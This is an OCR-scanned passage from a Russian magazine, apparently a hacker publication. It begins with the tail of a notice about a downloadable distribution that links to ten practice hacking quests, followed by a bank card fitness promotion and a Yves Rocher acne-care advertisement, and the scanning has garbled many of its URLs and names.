специальный дистрибутив (в виде ЫѵеСО или образа для ѴігІиаІВох), ты можешь устано- 
вить ѴРМ-соединение со специальной инфраструктурой, где всем желающим предлага- 
ется десять подготовленных профессионалами квестов. Проходя каждое из заданий, ты 
зарабатываешь баллы, — получается своего рода соревнование для хакеров. Дерзай. 
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на правах рекламы 



ПРЕДЛОЖЕНІИ^ 
МЕСЯЦА 

ОТ ^ 

ФИлш 



Сеть фитнеі=. 




с 25 ФЕВРА і III ПО ч? 

ВСЕ ДЕРЖАТЕЛИ «МуЖСКОЙ КАРТЫ» Ѵ 




ПОЛУЧАТ АБОНЕМЕНТЫ В 
ФИТНЕС-КЛУБ* 



подробности на сайте 

ѵѵѵѵѵѵ.тапсагсі.ги 





Оформить дебетовую или кредитную «Мужскую карту» 
можно на сайте тѵѵѵ.аІ^аЬапк,гу или позвонив 
по телефонам: 

(495) 229-2222 в Москве 

8-800-333-2-333 а регионах России (звонок бесплатный) 







ѴѴЕ8 РОСНЕР 

Р Р А N С Е Ив РошЕ - Создатель Растительной Косметики 




НЕ РЕШАЕШЬСЯ 

подойти ко мне? 



ПОБЕДИ робость С 

р и г 0 

у 5 I: 9 т 

ПЮР СИСТЕМ 



ЭФФЕКТИВНОСТЬ ПРОТИВ ПРЫЩЕЙ 
И БЕРЕЖНОЕ ОТНОШЕНИЕ К КОЖЕ 



Исследователи Растительной Косметики Ив Роше объединили 
салициловую кислоту, обладающую антибактериальным эффектом и 
способствующую обновлению кожи, для эффективного воздействия на 
прыщи, и экстракт мякоти Алоэ Вера БИО, получивший признание 
благодаря своим восстанавливающим свойствам, для гарантии 
оптимальной переносимости кожей. 

Эффективность доказана: 

- Глубоко очищает кожу. 

- Устраняет черные точки. 

- Предупреждает появление прыщей и черных точек. 



Присоединяйтесь 



О 0 



\ѵѵѵѵѵ.уѵе5-госЬег.ги 

Тел.: 8-800-3333-000 (звонок бесплатный) 



Реклама. Товар сертифицирован. (1 ) Самостоятельная оценка, тест на удовлетворенность 
продуктом, проведенный при участии 26 человек. 

* Формула создана под дерматологическим контролем. Рекомендовано французскими дерматологами. 





